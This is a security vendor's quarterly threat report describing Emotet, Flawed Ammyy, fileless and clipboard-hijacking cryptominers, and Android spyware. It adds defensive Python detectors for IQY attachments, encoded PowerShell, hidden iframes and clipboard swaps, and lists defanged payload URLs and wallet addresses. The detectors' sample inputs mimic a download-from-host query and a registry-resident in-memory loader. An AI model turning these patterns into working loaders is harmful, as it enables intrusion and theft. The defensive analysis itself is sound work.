Comodo Security Solutions, Inc.
1255 Broad Street, Clifton, NJ 07013, United States
Tel: +1 (888) 551 1531 | Tel: +1 (888) 266 6361 | Int: +1 (703) 581 6361 | Fax: +1 (973) 777 4394
sales@comodo.com
© 2018 All Rights Reserved. Comodo Security Solutions, Inc.

Global Threat Report
Q2 2018 Edition
Brought to you by Comodo Security Solutions, Inc.

Global Threat Report Q2 2018 Edition

Page 1 of 73

Table of Contents

1 EXECUTIVE SUMMARY ... 3
1.1 OVERVIEW ... 3
1.2 NEW TRENDS ... 3
1.2.1 Trojans jumped to the top of the malware list ... 3
1.2.2 Cryptominers evolved into multifunctional malware ... 3
1.2.3 Android malware skyrocketed in variety ... 3
1.2.4 Geopolitical intelligence ... 3

2 TROJANS GOING ON THE OFFENSIVE TO HUNT FOR CONFIDENTIAL DATA ... 4
2.1 THE MOST WIDESPREAD TROJAN ... 7
2.2 POWERSHELL-BASED ATTACK WITH EMOTET ... 8
2.3 FLAWED AMMYY RAT ATTACK BASED ON LEGITIMATE SOFTWARE ... 12
2.4 THE GROWTH OF FLAWED AMMYY ATTACKS FOR Q2 ... 15
2.5 AMMYY ADMIN DISSEMINATION AROUND THE WORLD FOR Q2 ... 15

3 CRYPTOMINER EVOLUTION: GOING FILELESS, KILLING COMPETITORS, CRASHING SYSTEMS ... 16
3.1 BADSHELL ATTACKS ENTERPRISES ... 16
3.2 WINSTARNSSMMINER, A SYSTEM KILLER ... 19
3.3 COINMINER KILLS RIVALS ... 20
3.4 COINHIVE CHANGES ITS SKIN ... 22
3.5 CRYPTOCURRENCY CLIPBOARD HIJACKER INTERCEPTS TRANSFERS ... 24

4 ANDROID DEVICES UNDER SIEGE ... 26
4.1 SPYING, STEALING, MINING ... 26
4.1.1 KevDroid ... 27
4.1.2 Zoo Park ... 29
4.1.3 MikeSpy ... 30
4.1.4 Xloader ... 30
4.1.5 Stalker Spy ... 31
4.1.6 Mystery Bot ... 32
4.1.7 FakeSpy ... 33
4.1.8 RedAlert ... 34
4.1.9 Hero Rat ... 34
4.1.10 Sonvpay ... 35
4.1.11 CoinHive ... 36
4.2 ANDROID MALWARE CATALOGUED BY MONTH ... 37
4.2.1 April 2018 ... 37
4.2.2 May 2018 ... 37
4.2.3 June 2018 ... 38

5 MALWARE IN Q2 2018: THE BIG PICTURE ... 39
5.1 STRATEGIC THREAT: COMPUTER WORMS ... 40
5.1.1 Generic Worms ... 41
5.1.2 Net Worms ... 42
5.1.3 Email Worms ... 43
5.1.4 P2P Worms ... 44
5.1.5 IM Worms ... 45
5.2 HIGH THREAT MALWARE ... 46
5.2.1 Backdoors ... 47
5.2.2 Viruses ... 48
5.2.3 Trojans ... 49
5.2.4 Exploits ... 50
5.3 MEDIUM THREAT MALWARE ... 51
5.3.1 Constructor ... 52
5.3.2 Packers ... 53
5.3.3 Email Flooder ... 54
5.3.4 Virtual Tools ... 55
5.3.5 Jokes ... 56
5.4 LOW THREAT MALWARE: APPLICATIONS ... 57
5.4.1 Applications ... 58
5.4.2 Unwanted Applications ... 59
5.4.3 Unsafe Applications ... 60

6 VERTICAL ANALYSIS ... 61

7 GEOPOLITICAL INTELLIGENCE ... 63
7.1 USA ... 63
7.2 CHINA ... 64
7.3 SOUTH KOREA ... 65
7.4 NORTH KOREA ... 66
7.5 ARMENIA ... 67
7.6 BELARUS ... 68
7.7 IRAQ ... 69
7.8 UKRAINE ... 70
7.9 CROATIA ... 71
7.10 FINLAND, RUSSIA, USA ... 72

8 CONCLUSIONS ... 73


1 Executive Summary

1.1 Overview

• In Q2, Comodo Cybersecurity detected approximately 400 million unique malware samples all over the world.
• The malware was detected in 237 countries' top-level domains.
• Russia, Turkey and India were the countries with the highest number of worm infections.
• The United Kingdom had the highest proportion of detected backdoors.
• Ukraine and Russia were the most common countries of detection for viruses.
• Germany was the #1 country hit by trojans.

1.2 New Trends

1.2.1 Trojans jumped to the top of the malware list

The most dangerous sign is the unfolding merger of trojans and phishing emails, which amplifies the spread of the malware. Attackers use trojans to deliver other malware, and the trojan surge accompanies a significant increase in other malware infections. As a result, users face a new challenge in the form of massive attacks that implant hidden malware with long-term activity.

1.2.2 Cryptominers evolved into multifunctional malware

Cryptomining decreased in quantity but grew in harmful capabilities. As events in Q2 demonstrated, this genre of malware is actively developing in two directions: better hiding and stronger persistence. Cryptominers have gained new features that let them fight antiviruses and root deeply in users' systems.

1.2.3 Android malware skyrocketed in variety

In Q2, the Comodo Threat Research Labs observed a huge spike in Android malware development. Android devices have become attractive targets for cybercriminals because a modern mobile device represents a treasure trove of data. Spyware takes the lead among Android malware types. Like real-world spies, Android spyware constantly changes guises and methods of avoiding detection, and its harmful potential goes up with every new version.

1.2.4 Geopolitical intelligence

Cyberattacks and malware spikes are often correlated with significant events in world politics. The appointments of the US Secretary of State and CIA Director, Armenia's political revolution, the Donald Trump and Vladimir Putin summit in Helsinki, the Champions League final in Ukraine, US-South Korean joint military exercises, the anniversary of the 1989 Tiananmen Square protests and other events during Q2 2018 clearly demonstrate the existence of such correlations.


2 Trojans going on the offensive to hunt for confidential data

The second quarter of 2018 brought a sudden change in malware competition. Trojans squeezed out other malware types and jumped to the top of the charts. Having gained the lion's share of the malware marketplace, they can radically influence the cybersecurity landscape. Their rise forces cybersecurity departments and individual users to update their defense tactics.

Malware Distribution by Type

Why are these changes inevitable?

Trojans are a special kind of malware. Their distinguishing feature is universality: they are most effective at providing a diversity of attacks, stealing data, implanting ransomware, adware or cryptominers, or even completely crashing systems.

Another special feature of trojans is covert activity. The owner of a trojan-infected machine can remain unaware of the attack for a long time, during which the trojan is an active malefactor.

Hence the need for a new approach to defense tactics. Let's have a closer look at the most active, vicious players on the trojan team to understand deeply what harm they can do to your computers if they sneak inside.


Distribution of top 30 Malware Families

In this list of the top 30 malware families, where trojans overwhelmingly dominate, you can find samples of this malware exhibiting diverse types of malicious activity.

For example, the leader of the attacks in Q2, TrojWare.Win32.Agent, is a trojan family that clandestinely penetrates users' computers and then downloads other malware from a cybercriminal server. The downloaded malware can be of any type.

Number two in the list, TrojWare.JS.Clickjack, exhibits different activity: it makes users unintentionally click on hidden links. The link can be just another advertisement or lead to a malicious website that infects users with other types of malware.

TrojWare.JS.Faceliker just clicks posts on Facebook on behalf of the user to promote fake or fraudulent pages. The malware infects users' browsers when they visit malicious or compromised websites. Then, when infected users open Facebook, Faceliker hijacks their "likes".

TrojWare.Win32.Kryptik steals information from computers and sends it to the cybercriminals' Command-and-Control server.


TrojWare.Win32.Injector uses process injection as its main technique to take malicious actions. It is mostly used to bypass security products.

TrojWare.JS.Downloader consists of scripts that download and execute malware from the Internet. It is usually spread via a phishing email.

Such diversity of malicious activity and their special ability to hide have always made trojans one of the hardest kinds of malware to fight. But in Q2 2018 they became even more sophisticated and dangerous. Comodo Cybersecurity Threat Research Labs observed especially alarming trends worthy of attention from the global cybersecurity community.

First among the trends is an explosive mixture of trojans and phishing emails. Earlier, phishing emails mostly contained a link to a malicious website to lure victims into supplying their credentials. But today phishing emails have become a potent means of delivery for trojans and other malware. These trojans steal credentials and private information by ferreting through infected machines in search of valuable data, which they then send to cybercriminals' servers.

The accompanying graph shows the most popular malware spread via email. Note that 18 of 20 are trojans.

Distribution of Phishing Families of Malware


2.1 The Most Widespread Trojan

The most proliferated trojan, TrojWare.Win32.Injector, is designed to steal credentials from infected computers. It was spread via a fake email imitating a message from a shipping and trading company. As seen in the screenshot, the attached malware is carefully disguised with a plausible name and icon to look like a real scanned document.

If a user takes the bait and runs the file, it copies itself to %AppData% as D5E2DEE36C7A.exe, then launches itself from that location and starts to gather credentials present in the system.

It collects credentials and private data from known browsers, email clients, FTP clients, WebDAV and SCP clients. Then it sends all the collected data to the attackers' server httpcallbedmlpackfarefrephp.

The phishing email


2.2 PowerShell-based attack with Emotet

Another alarming trend is related to the malware itself rather than its delivery method. Often cybercriminals use malware based not on native Windows .exe files but on PowerShell scripts and other legitimate software to infect a computer. This type of attack is much harder to detect with antivirus tools.

Emotet is one of the most aggressive trojans currently acting in cyberspace. Spread by various infection vectors and backed by a huge network of compromised hosts, it heavily affects many individuals and companies.

The following attack started with an email that imitated a message from the IRS about a "Tax Account Transcript". Notice that the message is written in a cheerful manner to inspire user trust.

The phishing email


The attached file is an Office document containing a VBScript. As the default settings of a newly installed Microsoft Office do not allow execution of such scripts, the attackers added a special option to convince the victims to turn on VBScript execution.

The special option to convince the victims to turn on VBScript execution


The purpose of the VBScript is to launch PowerShell.


The malware downloads itself to a temporary folder and executes binaries located at:

hxxp://www.iyilikleralemi.com/GtXvlc
hxxp://www.thecyberconxion.com/PUqUUe
hxxp://EliasWessel.com/vu6xGmS
hxxp://mossbeachmusic.de/XuBBN6r
hxxp://airmaxx.rs/wIdY

At the time of writing, only the thecyberconxion.com host was serving a malware binary (SHA1 5974190561e707f63d776e55336841bd871eebdb).

The binary moves itself to C:\Windows\SysWOW64\lanesviewer.exe and creates a service "lanesviewer" to ensure persistence.

The malware creates the "lanesviewer" service to ensure persistence


After that, Emotet begins its real mission: stealing private data from the compromised system, which it then sends to the cybercriminals' Command & Control server.

The next example is even more cunning, because it infects computers with popular, legitimate Microsoft software.

2.3 Flawed Ammyy RAT attack based on legitimate software

The Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks. What is most impressive is that it is based on legitimate software called Ammyy Admin. Its history is a striking example of how malicious hackers turn legitimate tools into a thief's tool.

Ammyy Admin is remote desktop software created by the Ammyy Group company. It provides an easy way to establish a reliable remote desktop connection, connecting remote computers within seconds without additional installation or configuration work.

The dark side of this tool is that its features ideally suit the purposes of cybercriminals. Unsurprisingly, perpetrators tried to adopt it for their malicious activity. Cybercriminals repeatedly compromised the Ammyy Group website and replaced the original Ammyy Admin software with a bundle containing malware. Thus every user who downloaded Ammyy Admin became covertly infected. Ammyy Group cleaned up the compromised website, but the attackers infected it again, and this vicious cycle continued endlessly.


As you can see in the diagram, Ammyy Admin was used in spreading many types of nefarious malware.

The newest malicious modification of Ammyy Admin is called Flawed Ammyy. It is a remote access trojan (RAT) that appeared in the wild at the beginning of 2016. It got its name from the leaked source code of the third Ammyy Admin version. Flawed Ammyy RAT lets the attackers use functions such as Remote Desktop control, File System Manager, proxy support and audio chat. Cybercriminals take total control of the infected host and can run amok: steal credentials and documents, remove or add files, run applications, install other malware, etc.

The way Flawed Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users. What is especially worth noticing is the fact that these tricks are also based on using legitimate software, this time from Microsoft.


Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment, as in the following screenshot.

The phishing email

IQY files are intended for making an Internet query from MS Excel, so an IQY contains a URL and other related parameters. It can download files and run them directly in MS Excel.

The infected IQY included a malicious URL, so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell.

Malware runs PowerShell
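Because an IQY attachment is a tiny plain-text file whose third line is the URL Excel will fetch, a mail gateway or endpoint rule can inspect it before Excel ever opens it. The following parser and classifier is an added example written for this report, not code from Comodo or from the samples described; the sample IQY content, the placeholder host and the allowlist of internal query hosts are all assumptions constructed for the example.

```python
"""Parse an Excel .iqy web-query file and classify the URL it would fetch.

IQY layout (Excel web query): line 1 is the query type ("WEB"), line 2 the
format version ("1"), line 3 the URL, then optional Key=Value lines such as
Selection= or Formatting=.
"""
from urllib.parse import urlparse

# Constructed sample resembling a malicious IQY attachment; the host is a
# placeholder, not an indicator from the report.
SAMPLE_IQY = "WEB\r\n1\r\nhttp://malicious.example/1.dat\r\n\r\nSelection=EntirePage\r\n"

# Hosts from which the organization legitimately refreshes Excel web queries
# (assumption for this example).
ALLOWED_HOSTS = {"intranet.example.com", "reports.example.com"}


def parse_iqy(text):
    """Return a dict with query type, version, URL and parameters; raise ValueError otherwise."""
    lines = [ln.strip() for ln in text.splitlines()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not an Excel WEB query file")
    params = {}
    for ln in lines[3:]:
        if "=" in ln:
            key, _, value = ln.partition("=")
            params[key.strip()] = value.strip()
    return {"type": lines[0].upper(), "version": lines[1], "url": lines[2], "params": params}


def assess_iqy(text, allowed_hosts=ALLOWED_HOSTS):
    """Classify an IQY attachment as 'benign', 'suspicious' or 'malformed'.

    Returns (verdict, reasons) so the reasons can be logged or shown to an analyst.
    """
    try:
        query = parse_iqy(text)
    except ValueError as exc:
        return "malformed", [str(exc)]
    url = urlparse(query["url"])
    reasons = []
    if url.scheme not in ("http", "https"):
        reasons.append(f"unexpected scheme {url.scheme!r}")
    host = (url.hostname or "").lower()
    if host not in allowed_hosts:
        reasons.append(f"external host {host!r} not in allowlist")
    if url.path.lower().endswith((".dat", ".exe", ".ps1", ".vbs", ".hta")):
        reasons.append(f"URL path ends in an executable or script extension: {url.path}")
    return ("suspicious" if reasons else "benign"), reasons


if __name__ == "__main__":
    print(assess_iqy(SAMPLE_IQY))
```

The allowlist is the important control: an IQY that points anywhere outside the hosts the organization actually uses for data refresh has no business reaching a user, regardless of what the URL path looks like.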


Thus, in this case, machines face extremely dangerous and potent malware created and delivered via legitimate software. This makes it much harder for antivirus software to detect an attack.

2.4 The growth of Flawed Ammyy attacks for Q2

The growth of Flawed Ammyy attacks for Q2

2.5 Ammyy Admin dissemination around the world for Q2

As illustrated, trojans became an 800-pound gorilla in the malware market in Q2. This trend will inevitably entail a change of attack vectors toward covert theft and manipulating users. This trend is a real gift for cybercriminals and a terrible nightmare for users.

Trojans let attackers gain time. As the malware acts covertly, the cybercriminals have more than enough time to use stolen data to their advantage. In many cases attacks can only be discovered too late, after money is withdrawn from a bank account, confidential data is published, etc. The merging of trojans as payloads and phishing emails as the means of delivery observed during Q2 will result in a huge surge in such attacks and victims. And using legitimate tools like PowerShell for running malware will amplify the number of victims even more, because such attacks are much harder to detect with antiviruses.

To fight these attacks, cybersecurity departments need to rearrange their approach to security measures in line with the new trends above. Combining the best malware detection tools and methods of protecting data, built on defense-in-depth principles, provides the most promising solution.

[Chart: The growth of Flawed Ammyy attacks for Q2. Monthly detections: Apr 43,188; May 46,382; Jun 48,881.]


3 Cryptominer Evolution: Going Fileless, Killing Competitors, Crashing Systems

Cryptominers do not lead the Q2 malware pack, but that does not mean their impact is greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and reprovisioning to fight more efficiently. Cryptominers are quickly developing and gaining new, dangerous abilities.

Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers. For that reason, many users did not regard them as particularly dangerous: at least cryptominers would not steal information or destroy data like other malware, merely sucking up CPU resources. Moreover, they typically did not employ strong obfuscation and could be easily discovered and deleted.

But Q2 events clearly showed that the situation has radically changed.

New samples of cryptominers detected by Comodo malware analysts exhibit far more harmful abilities than those required for merely mining cryptocurrency. These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals. They are learning to hide and to fight against antimalware tools. They can camouflage themselves, kill competing cryptominers and even crash user systems if met with an attempt to delete the malware.

3.1 BadShell attacks enterprises

Fileless malware is next-generation malware, especially compared with traditional infection via .exe files. File-based malware resides on the hard drive, making it easier to detect. But fileless malware is different. As its name suggests, this type of malware represents malicious code injected into legitimate OS processes. It need not be installed on a victim machine but functions only in memory, making it much harder for antiviruses to detect.

Usually such malware is spread via malicious ad banners. Clicking on a banner redirects a user to an infected website, where the malware covertly installs itself on the victim's computer. As many antivirus tools cannot detect it, users remain unaware of being infected. Not surprisingly, its use by cybercriminals is on the increase.

Last quarter, Comodo Threat Research Labs analysts faced a scenario of just such an attack. A company with several thousand endpoints was compromised by fileless malware. When their legacy security software failed to protect them, the company looked to Comodo Threat Research Labs for assistance.


Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes: PowerShell to execute commands, Task Scheduler to ensure persistence, and the Registry to hold the malicious binary code. In the screenshots below you see exactly how the malware, dubbed BadShell, works.

If we decode the PowerShell arguments, we see the malicious code in the registry. The code is injected into an existing running process by the PowerShell script.
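The decoding step described above is exactly what a detection rule can automate: PowerShell's -EncodedCommand argument is Base64 of the UTF-16LE script, so a process-creation log (Sysmon Event ID 1, Windows 4688) can be decoded on the fly and checked for the BadShell combination of a registry read, a decode and an in-memory load. The following is an added example written for this report, not Comodo's tooling; the log lines, the registry path and the script text are constructed, and the script contains no working payload.

```python
"""Decode -EncodedCommand arguments from process-creation events and flag the
registry-resident, in-memory loading pattern described for BadShell."""
import base64
import re

# Constructed script of the kind described (placeholder registry key, no real payload).
_SAMPLE_SCRIPT = (
    "$d=(Get-ItemProperty -Path 'HKCU:\\Software\\PLACEHOLDER' -Name 'blob').blob;"
    "$b=[Convert]::FromBase64String($d);"
    "[Reflection.Assembly]::Load($b)"
)


def encode_command(script):
    """PowerShell's -EncodedCommand is Base64 over the UTF-16LE encoding of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process-creation events, one per line (Sysmon-style key=value fields).
SAMPLE_LOG = [
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell.exe -NoP -W Hidden -EncodedCommand " + encode_command(_SAMPLE_SCRIPT),
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell.exe -File C:\\scripts\\inventory.ps1",
]

# -e, -ec, -enc and -EncodedCommand are all accepted prefixes of the parameter.
_ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Indicators that together describe loading code held in the registry without a file on disk.
INDICATORS = {
    "registry_read": re.compile(r"Get-ItemProperty|\.GetValue\(|HK(?:LM|CU):", re.IGNORECASE),
    "decode": re.compile(r"FromBase64String|Decompress", re.IGNORECASE),
    "in_memory_load": re.compile(
        r"Reflection\.Assembly|Invoke-Expression|\bIEX\b|VirtualAlloc|CreateRemoteThread|WriteProcessMemory",
        re.IGNORECASE,
    ),
}


def decode_encoded_command(command_line):
    """Return the decoded script if the command line carries an encoded command, else None."""
    m = _ENC_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_script(script):
    """Return the set of indicator names present in a decoded script."""
    return {name for name, rx in INDICATORS.items() if rx.search(script)}


def scan_log(lines):
    """Return (line_index, decoded_script, indicators) for each suspicious event.

    An event is suspicious when the decoded script both reads the registry and
    loads code in memory; a decode step alone is common in benign automation.
    """
    hits = []
    for i, line in enumerate(lines):
        script = decode_encoded_command(line)
        if script is None:
            continue
        found = score_script(script)
        if {"registry_read", "in_memory_load"} <= found:
            hits.append((i, script, found))
    return hits


if __name__ == "__main__":
    for idx, script, found in scan_log(SAMPLE_LOG):
        print(f"line {idx}: {sorted(found)} :: {script}")
```

Requiring two of the three indicator classes keeps the rule from firing on every encoded administrative script; the persistence side described on the page (a scheduled task that launches the same command line) is a second, independent signal worth correlating in the same query.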

BadShell at work


The malicious code in the registry


This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to perform their jobs. Comodo analysts took over the situation and cleaned the infection from all involved computers, but of course the financial losses of the company were irreversible.

Invulnerability to antivirus and persistence in the system are the most important attributes for a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals give special attention to the cryptominer's ability to elude antivirus software.

Below is another cunning technique that turns an infected machine into a slave of the attacker.

3.2 WinstarNssmMiner, a system killer

Like other cryptominers, WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature: it can root into a system so deeply that it becomes unremovable. Attempting to kill it will kill the target system totally.

The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background looking for antivirus products and disables them.

The malicious code disguised as svchost.exe

Especially impressive is that both infected svchost.exe processes possess the system attribute "CriticalProcess", meaning that terminating either of them will crash the system, leaving the user with a blue screen.

WinstarNssmMiner spreading around the world


Cryptominers can kill not only victims' systems but also their cryptomining competitors.

3.3 CoinMiner kills rivals

CoinMiner stands out among other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.

CoinMiner kills its rivals as follows.

The code below downloads CoinMiner for the Windows architecture (x86 or x64) and then checks whether a miner is already running by testing for the presence of an "AMDDriver64" process.


The code downloads CoinMiner and checks if a miner is already running

The malware maintains two lists, named $malwares and $malwares2, with the names of the processes that it is instructed to kill. The lists include other types of cryptominers.

In this way, CoinMiner undividedly occupies the victim's computer to use its resources for mining cryptocurrency.


Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, easing detection by users. In Q2, these cryptominers learned to hide. CoinHive is the brightest example of them.

3.4 CoinHive changes its skin

CoinHive is a popular JavaScript cryptominer. If you put its string of code into your website page, every visitor to the site will mine coins for you.

As you can see, the CoinHive script is easily detected.

The CoinHive script

After many publications on this subject in the mass media and cybersecurity reports, users have started checking website code for cryptominers. But in the second quarter, perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners.


As a result, the malicious code on a webpage looks like this.

The obfuscated malicious code on a webpage

If we decode the string, we encounter an iframe.

The iframe loads the URL shortener

The iframe loads the URL shortener. Notice that the width and height of the iframe are set to 1 to make the iframe as invisible as possible.

Now let's look at the URL https://cnhv.co.

And there we find the familiar link to CoinHive.

The link to CoinHive


What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
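The user in that scenario searched the page source for the familiar CoinHive script and missed the encoded document.write that injects a 1x1 iframe. A site owner or scanner can instead decode the payloads and look for the iframe itself: tiny or display:none, and pointing at a URL shortener such as cnhv.co, the shortener domain named on this page. The code below is an added example for this report, not Comodo's scanner; the sample page, the placeholder short-link path and the list of other shortener hosts are assumptions.

```python
"""Find hidden iframes that load a URL shortener, including ones assembled at
runtime from unescape('...') or atob('...') payloads inside document.write/eval."""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# cnhv.co is the Coinhive short-link domain from the report; the rest are assumptions.
SHORTENER_HOSTS = {"cnhv.co", "bit.ly", "goo.gl"}

# Constructed page: an unescape()'d document.write hiding a 1x1 iframe, plus a
# harmless atob() payload to show that decoding alone is not the alarm.
_HIDDEN = "<iframe src='https://cnhv.co/PLACEHOLDER' width='1' height='1' style='display:none'></iframe>"
SAMPLE_HTML = (
    "<html><body><h1>Welcome</h1>"
    "<script>document.write(unescape('" + "".join("%%%02X" % b for b in _HIDDEN.encode()) + "'));</script>"
    "<script>eval(atob('" + base64.b64encode(b"var x = 1;").decode() + "'));</script>"
    "</body></html>"
)

_PCT = re.compile(r"unescape\(\s*['\"]([^'\"]+)['\"]\s*\)")
_B64 = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")


def decode_payloads(html):
    """Return the strings hidden inside unescape('...') and atob('...') calls."""
    out = [unquote(m) for m in _PCT.findall(html)]
    for m in _B64.findall(html):
        try:
            out.append(base64.b64decode(m, validate=True).decode("utf-8", "replace"))
        except ValueError:
            pass
    return out


class _IframeCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))


def _dim(value):
    """Parse a width/height attribute; a missing or non-numeric value counts as large."""
    try:
        return int(re.sub(r"px$", "", (value or "").strip()))
    except ValueError:
        return 10**6


def find_hidden_shortener_iframes(html):
    """Return iframes, from the raw page and from decoded payloads, that are
    visually hidden (1x1 or display:none) and load a URL-shortener host."""
    iframes = []
    for chunk in [html] + decode_payloads(html):
        parser = _IframeCollector()
        parser.feed(chunk)
        parser.close()
        iframes.extend(parser.iframes)
    hits = []
    for attrs in iframes:
        host = (urlparse(attrs.get("src", "")).hostname or "").lower()
        tiny = _dim(attrs.get("width")) <= 1 and _dim(attrs.get("height")) <= 1
        hidden = "display:none" in (attrs.get("style") or "").replace(" ", "").lower()
        if host in SHORTENER_HOSTS and (tiny or hidden):
            hits.append({"src": attrs.get("src"), "host": host, "tiny": tiny, "hidden": hidden})
    return hits


if __name__ == "__main__":
    print(find_hidden_shortener_iframes(SAMPLE_HTML))
```

Resolving the short link and checking where it lands (the final host, not the shortener) is the natural next step, but that requires network access and is left out of this offline example.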

The next malware in the row prefers not to mine cryptocurrency but to steal it on the fly.

3.5 Cryptocurrency clipboard hijacker intercepts transfers

It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.

Cryptocurrency transfers require a wallet address. The address is a long string combining different characters and numbers, so it is almost impossible to remember or fill in manually. That is why users usually copy-paste a wallet address to make a transaction. Cybercriminals regard this copy-paste process as a breach they can use to their advantage.

The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it replaces it with the address of a wallet under the attacker's control. So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.

A new Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses

This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers. But cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.

Here is an example of a clipboard hijacker attack.

A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
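The swap works because nothing on the user's side compares what was copied with what is about to be pasted. A clipboard guard that remembers the address the user actually copied and alerts when the clipboard later holds a different wallet-looking address closes that gap. The code below is an added example for this report, not Comodo's code or the malware's; the event stream is constructed, the two addresses are the ones quoted just above, and the address formats are recognised by shape only (no checksum verification).

```python
"""Detect clipboard substitution of cryptocurrency wallet addresses from a
stream of clipboard events."""
import re

# Base58 alphabet excludes 0, O, I and l; legacy Bitcoin addresses start with 1 or 3.
BTC_LEGACY = re.compile(r"^[13][1-9A-HJ-NP-Za-km-z]{25,34}$")
BTC_BECH32 = re.compile(r"^bc1[02-9ac-hj-np-z]{11,71}$", re.IGNORECASE)
ETH_ADDR = re.compile(r"^0x[0-9a-fA-F]{40}$")


def looks_like_wallet(text):
    """Return the coin family if text is shaped like a wallet address, else None."""
    s = text.strip()
    if BTC_LEGACY.match(s) or BTC_BECH32.match(s):
        return "bitcoin"
    if ETH_ADDR.match(s):
        return "ethereum"
    return None


class ClipboardGuard:
    """Track what the user copied versus what the clipboard currently holds."""

    def __init__(self):
        self.user_copied = None  # last wallet address placed on the clipboard by a user action
        self.alerts = []

    def on_event(self, event):
        """event is ("copy", text) for a user copy action or ("change", text) for
        any observed clipboard update, including ones the user did not make.
        Returns an alert dict when a tracked address has been replaced, else None."""
        kind, text = event
        text = text.strip()
        family = looks_like_wallet(text)
        if kind == "copy":
            # Copying ordinary text ends tracking; copying an address starts it.
            self.user_copied = text if family else None
            return None
        if kind == "change" and family and self.user_copied and text != self.user_copied:
            alert = {"expected": self.user_copied, "found": text, "family": family}
            self.alerts.append(alert)
            return alert
        return None


# Constructed event stream reproducing the report's example.
SAMPLE_EVENTS = [
    ("copy", "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"),   # user copies the intended address
    ("change", "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"),  # clipboard silently rewritten
    ("copy", "meeting notes for Monday"),              # ordinary text clears tracking
    ("change", "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"),  # no tracked address, so no alert
]


def run(events):
    """Feed events through a guard and return the alerts raised."""
    guard = ClipboardGuard()
    for ev in events:
        guard.on_event(ev)
    return guard.alerts


if __name__ == "__main__":
    for alert in run(SAMPLE_EVENTS):
        print(f"clipboard swap: expected {alert['expected']} but found {alert['found']}")
```

On a real endpoint the "copy" events would come from the wallet application or a hook on the user's copy shortcut and the "change" events from the OS clipboard-change notification; the guard's logic stays the same. The same comparison belongs in the wallet UI as a last line of defence: show the pasted address back to the user next to the one they intended.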


An example of a clipboard hijacker attack

Spreading of Clipboard Hijacker malware around the world

Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a serious new challenge for cybersecurity departments and vendors.


4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.

If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.

Today spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.

The digital spooks


Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It is distributed in three versions:

Version 1: Naver Defender
Version 2: Netease Defender
Version 3: PU

Disguises of KevDroid

